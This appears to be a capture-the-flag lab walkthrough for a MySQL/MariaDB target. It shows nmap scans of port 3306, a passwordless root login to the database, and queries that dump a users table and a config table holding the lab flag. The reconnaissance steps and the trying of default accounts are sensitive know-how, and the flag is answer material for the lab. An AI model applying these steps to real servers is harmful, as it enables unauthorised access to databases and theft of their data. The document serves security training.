02.SEQUEL (MYSQL)
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@oco:~$ nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
3306/tcp open mysql?
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding -sC is another good way to determine service versions
- the -sC option will run safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3306
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 98
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, LongColumnFlag, SupportsCompression, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: rq_ju/)~cRQ"RU7Sz-oi
|_ Auth Plugin Name: mysql_native_password
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3306
PORT STATE SERVICE
3306/tcp open mysql
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 3306
- e.g., weak configurations, or known vulnerabilities in the MySQL service
- if no results are found then the service may be fully patched!
root@htb:~$ which mysql
root@htb:~$ mysql --help
root@htb:~$ mysql -u root -h 10.129.198.75
MariaDB [(none)]>
* root is the superuser account in MySQL, similar to the root user in Unix/Linux
systems. It has full privileges on the database server. It is the default for most installations.
- other possible defaults are mysql & admin
MariaDB [(none)]> help;
MariaDB [(none)]> show databases;
htb
MariaDB [(none)]> use htb;
MariaDB [htb]> show tables;
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email            |
+----+----------+------------------+
|  1 | admin    | admin@sequel.htb |
|  2 | lara     | lara@sequel.htb  |
|  3 | sam      | sam@sequel.htb   |
|  4 | mary     | mary@sequel.htb  |
+----+----------+------------------+
4 rows in set (0.010 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.010 sec)